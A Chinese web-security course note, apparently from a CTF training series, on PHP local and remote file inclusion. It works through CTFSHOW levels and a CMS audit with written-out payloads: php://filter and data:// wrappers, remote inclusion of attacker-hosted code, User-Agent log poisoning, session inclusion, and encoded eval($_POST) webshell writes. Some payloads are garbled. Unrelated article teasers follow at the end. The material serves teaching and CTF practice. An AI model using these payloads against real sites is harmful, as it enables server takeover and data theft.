小迪安全42WEB攻防-通用漏洞文件包含LFIRFI伪协议

news2024/12/24 0:17:47

#知识点:
1、解释什么是文件包含
2、分类-本地LFI&远程RFI
3、利用-配合上传&日志&会话
4、利用-伪协议&编码&算法等


#核心知识:
1、本地包含LFI&远程包含RF1-区别
一个只能包含本地,一个可以远程加载
具体形成原因由代码和环境配置文件决定

2、各类脚本语言包含代码写法见下文

<!-#include file="1.asp"-->
<!-#include file="top.aspx"->
<c:import url=http://thief.one/1.jsp">
<jsp:include page="head.jsp"/>
<%@ include file="head.jsp"%>
<?Php include(‘test.php’)?>

3、各类脚本语言包含伪协议玩法见图
https://www.cnblogs.com/endust/p/11804767.html

#思路要点:
黑盒发现:主要观察参数传递的数据和文件名是否对应

?X=文件名

白盒发现:
1、 可通过应用功能追踪代码定位审计
2、 可通过脚本特定函数搜索定位审计
3、 可通过伪协议玩法绕过相关修复等

#本课总结:
1、有可控文件如能上传文件,配合上传后包含

  1.  无可控文件可以利用日志或Session&伪协议

    3、代码固定目录及文件后缀时需考虑版本绕过
  2.  伪协议玩法是建立在代码中只有变量存在时

文件包含:

LFI(本地包含)和RFI(远程包含)

文件从哪儿来?

  1. 文件上传,上传至服务器(服务器会对脚本进行过滤,故大部分都是非脚本文件)
  2. 通过日志UA、session会话文件
  3. 伪协议(缺点:需要一定的条件:allow的配置需要开启,且处在当前的包含,不能有其它的干扰)

前置知识-原理&分类&探针&利用&修复

CTF应用-CTFSHOW-78关卡到117关卡


CMS源码-XHCMS-代码审计&日志&绕过

#前置知识原理&分类&探针&利用&修复

包含:也就相似与函数(文件)调用
实现过滤功能,是每个代码段进行过滤编写,还是写一个过滤文件

  1. 每个需要过滤的地方,进行一次过滤的编写
  2. 每个需要过滤的地方,进行一次文件包含调用过滤函数

包含即使执行

攻击思路:

  1. 配合文件上传getshell,图片带有后门代码,包含这个图片,脚本代码就可以被触发
  2. 配合日志文件进行getshell,日志会记录访问UA信息,修改UA信息为后门代码,包含即执行后门代码
  3. 配合会话文件进行getshell,session


#CTF应用-CTFSHOW-78关卡到117关卡

78-php&http协议

直接访问?Flag.php,发现无任何反应

那么就可能是要用伪协议了,由于我们不知道其他文件的路径,所以我们用不了file、zip等的伪协议

payload:php filter

?File=php://filter/read=convert.base64-encode/resource=flag.php

是一窜base64编码,解密即可

payload:php input

?file=php://input post:<?Php system('tac flag.php);?>

payload:远程包含

本地包含和远程包含的核心:是管理员的配置问题和代码问题

?File=php://www.xiaodi8.com/1.txt 

1.txt:<?php system(‘tac flag.php’);?>

Payload:Data协议

79data&http协议

从代码中,发现它对php进行了转义,这意味着php协议不能使用

因此可以使用data和远程协议等


payload: 

?file=data://text/plain,<?=system(‘tac flag.*’);?>

?file=data://text/plain;base64.PD9waHAgc3IzdGVtKCd0YWMgZmxhZy5waHAnKTs/Pg==

payload: 

?File=http://www.xiaodi8.com/1.txt 

  1. txt: <?php system(‘tac flag.*’):?>

     

80 81-日志包含

80

这次把data和远程(测试)过滤了

1、 利用其他协议,如file zib等
2、 利用日志记录UA特性包含执行

分析需文件名及带有php关键字放弃:

之前用的system(‘flag.*’)——这个是调用了系统操作的

而对于路径是不存在的,会直接以flag.*为文件名


故利用日志记录UA信息, UA带入代码

通过数据包分析,中间件容器为nginx

包含: /var/log/nginx/access.log

抓包更改其数据包的UA头,使日志文件去执行<?php system(‘cat flag.*’)?>

81

它这里是多了个分号过滤

还是可以用日志文件

82-86-SESSIONE

https://www.cnblogs.com/echoDetected/p/13976405.html

session固定位置

因为session是可以进行更改的,所以就和日志UA有一样的思路

87-php://filter/write&加密编码

利用base64:

url编码2次: php//filter/write=convert.base64-decode/resource=123.php content=aaPD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg==

因为考虑到urldecode,因此需要进行加密,从而去满足函数的要求,网页会第一次解密,函数会第二次解密,所以我们需要连续加密两次

2、利用凯撒13:

url编码2次: php://filter/write=string.rot13/resource=2.php
content=<?cuc flfgrz('gnp.s*.cuc');?>

88-data&base64协议

过滤PHP,各种符号,php代码编码写出无符号base64值

Payload:

file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTtY2hvIDEyMZs/PmFK

117-php://filter/write&新的算法

Php没被过滤


convert.iconv.:-种过滤器,和使用iconv()函数处理流数据有等同作用!

<?php
  $result = iconv("UCS-2LE",”UCS-2BE". '<?php eval($S_ POST[a]);?>);

echo“经过一次反转:"。$result."\n";

echo“经过第二次反转:" .iconv("UCS-2LE","UCS-2BE",$result);

?>

Payload: file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php

contents=?<hp pvela$(P_SO[T]a;)>?

#CMS源码-XHCMS-代码审计&日志&绕过

1、搜索特定函数寻包含点

2、固定目录及后缀名需绕过

3、由CMS无上传用日志包含

Index.php

它进行了伪协议的过滤

1.txt

但是在代码中,会对php进行解析,所以要加1.txt.php才会被解析

用日志文件也不行,会被直接加php

长度限制绕过:长度会把脚本的固定后缀给击破

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1523609.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

PyQt5使用

安装Pyqt5信号与槽使用可视化界面编辑UI (Pyside2)ui生成之后的使用(两种方法)1 ui转化为py文件 进行import2 动态调用UI文件 安装Pyqt5 pip install pyqt5-tools这时候我们使用纯代码实现一个简单的界面 from PyQt5.QtWidgets import QApplication, QMainWindow, QPushButto…

练习8 Web [GYCTF2020]Blacklist

这道题其实不是堆叠注入&#xff0c;但是我在联合查询无效后&#xff0c;试了一下堆叠&#xff0c;最后一步发现被过滤的sql语句太多了&#xff0c;完全没法 查阅其他wp的过程[GYCTF2020]Blacklist 1&#xff08;详细做题过程&#xff09; 是用的handler语句&#xff0c;只能用…

基于肤色模型(YCbCr模型)的人面定位统计算法,Matlab实现

博主简介&#xff1a; 专注、专一于Matlab图像处理学习、交流&#xff0c;matlab图像代码代做/项目合作可以联系&#xff08;QQ:3249726188&#xff09; 个人主页&#xff1a;Matlab_ImagePro-CSDN博客 原则&#xff1a;代码均由本人编写完成&#xff0c;非中介&#xff0c;提供…

【渗透测试】redis漏洞利用

redis安装及配置 wget http://download.redis.io/releases/redis-3.2.0.tar.gz tar xzf redis-3.2.0.tar.gz cd redis-3.2.0 make cp /root/redis-6.2.6/redis.conf /usr/local/redis/bin/ cd /usr/local/redis/bin/ vi redis.conf #修改内容如下&#xff1a; #protected-mode …

第十三届蓝桥杯(C/C++ 大学B组)

目录 试题 A: 九进制转十进制 试题 B: 顺子日期 试题 C: 刷题统计 试题 D: 修剪灌木 试题 E: X 进制减法 试题 F: 统计子矩阵 试题 G: 积木画 试题 H: 扫雷 试题 I: 李白打酒加强版 试题 J: 砍竹子 试题 A: 九进制转十进制 九进制正整数 ( 2022 )转换成十进制等于多…

【Vite+Ts】自动按需引入Element-Plus

安装插件 cnpm i -D unplugin-vue-components unplugin-auto-import unplugin-element-plus修改vite.config.ts // vite.config.ts import AutoImport from "unplugin-auto-import/vite"; import Components from "unplugin-vue-components/vite"; impor…

字符串函数和内存函数的模拟实现

目录 前言 1. 字符串操作 1.1 strncpy 1.1.1 讲解 1.1.1 模拟实现 1.2 strncat 1.2.1 讲解 1.2.2 模拟实现 2. 字符串检验 2.1 strlen 2.1.1 讲解 2.1.2 模拟实现 2.2 strstr 2.2.1 讲解 2.2.2 模拟实现 3. 字符数组操作 3.1 memcpy 3.1.1 讲解 3.1.2 模拟实…

《操作系统实践-基于Linux应用与内核编程》第10章--实验 Qt聊天程序

前言: 内容参考《操作系统实践-基于Linux应用与内核编程》一书的示例代码和教材内容&#xff0c;所做的读书笔记。本文记录再这里按照书中示例做一遍代码编程实践加深对操作系统的理解。 引用: 《操作系统实践-基于Linux应用与内核编程》 作者&#xff1a;房胜、李旭健、黄…

15届蓝桥杯第三期模拟赛所有题目解析

文章目录 &#x1f9e1;&#x1f9e1;t1_奇数次数&#x1f9e1;&#x1f9e1;思路代码 &#x1f9e1;&#x1f9e1;t2_台阶方案&#x1f9e1;&#x1f9e1;思路代码 &#x1f9e1;&#x1f9e1;t3_约数个数&#x1f9e1;&#x1f9e1;思路代码 &#x1f9e1;&#x1f9e1;t4_最…

特殊文本文件、日志技术

特殊文件 为什么要用这些特殊文件&#xff1f; 存储多个用户的&#xff1a;用户名、密码 特殊文件:Properties属性文件 特点&#xff1a; 都只能是键值对键不能重复文件后缀一般是.properties结尾的 作用&#xff1a;存储一些有关系的键值对数据 Properties 是一个Map集合(键…

Ubuntu Argoverse API安装

1. 创建并进入conda环境 conda create -n Argoverse python3.8 conda activate Argoverse2. 拉取argoverse-api源码 git clone https://github.com/argoai/argoverse-api.git3. 下载高精地图 Download hd_maps.tar.gz from Argoverse 4. 安装api cd argoverse-api pip in…

STM32 Simulink 自动代码生成电机控制——霍尔有感六步方波仿真到开发板运行

目录 前言 方波控制理论 仿真 代码集成到开发板运行 总结 前言 回想以前在学校手写代码实现方波控制&#xff0c;花了不少时间。现在各大MCU厂家都有自己的有感或者无感方波控制的方案。这次尝试用Simulink来完成应用层算法的仿真再到代码生成开发板运行的完整流程。 方波…

达梦数据库管理

一、表空间管理介绍 在 DM 数据库中&#xff0c;表空间由一个或者多个数据文件组成。 DM 数据库中的所有对象在逻辑上都存放在表空间中&#xff0c;而物理上都存储在所属表空间的数据文件中。 DM数据库中的表空间可以分为普通表空间和混合表空间。普通表空间不能存储HUGE表&…

《IEEE Transactions on Robotics》发表!北京大学研究团队推出具有多种运动模态的软体两栖机器人

两栖机器人以其在复杂水陆混合环境中的卓越适应性而脱颖而出&#xff0c;成为非结构化场景下信息监测、资源勘探和灾难救援等多元化任务的理想选择。凭借能够在水生和陆生环境中自如切换的优势&#xff0c;两栖机器人在如上任务执行过程中展现出对多变环境的惊人适应能力。 在…

【Godot4.2】颜色完全使用手册

概述 本篇简单汇总Godot中的颜色的构造和使用&#xff0c;内容包括了&#xff1a; RGB、RGBA&#xff0c;HSV以及HTML16进制颜色值、颜色常量等形式构造颜色颜色的运算以及取反、插值用类型化数组、紧缩数组或PNG图片形式存储多个颜色 构造颜色 因为颜色是一种视觉元素&…

配置Web运行环境与第一个网页

安装与配置Web环境: 如下使用了VSC作为web的运行环境。 下面是VSC的官网:Download Visual Studio Code - Mac, Linux, Windowshttps://code.visualstudio.com/download 进入官网后按照自己的系统下载&#xff0c;我下载的是Windows. 下载完之后双击打开。 接下来就是安装&…

探讨TCP的可靠性以及三次握手的奥秘

&#x1f31f; 欢迎来到 我的博客&#xff01; &#x1f308; &#x1f4a1; 探索未知, 分享知识 !&#x1f4ab; 本文目录 1. TCP的可靠性机制1.2可靠性的基础上,尽可能得提高效率 2. TCP三次握手过程3. 为何不是四次握手&#xff1f; 在互联网的复杂世界中&#xff0c;TCP&am…

Autosar Crypto Driver学习笔记(二)

文章目录 Crypto DriverFunction definitionsGeneral APICrypto_InitCrypto_GetVersionInfo Job Processing InterfaceCrypto_ProcessJob Job Cancellation InterfaceKey Management InterfaceKey Setting Interface密钥设置接口Crypto_KeyElementSetCrypto_KeySetValid Key Ex…

Linux操作系统及进程(一)

一、操作系统的概念 概念 &#xff1a;任何计算机系统都包含一个基本的程序集合&#xff0c;称为操作系统(OS)。笼统的理解&#xff0c;操作系统包括&#xff1a; 内核&#xff08;进程管理&#xff0c;内存管理&#xff0c;文件管理&#xff0c;驱动管理&#xff09; 其他程…

Redis淘汰策略,持久化和集群

Redis淘汰策略 Redis 的 OBJECT 命令提供了多个子命令&#xff0c;用于检查有关键的内部详细信息。以下是可用的子命令及其描述&#xff1a; ENCODING <key>&#xff1a;返回用于存储与键关联的值的内部表示类型。 FREQ <key>&#xff1a;返回键的访问频率索引。返…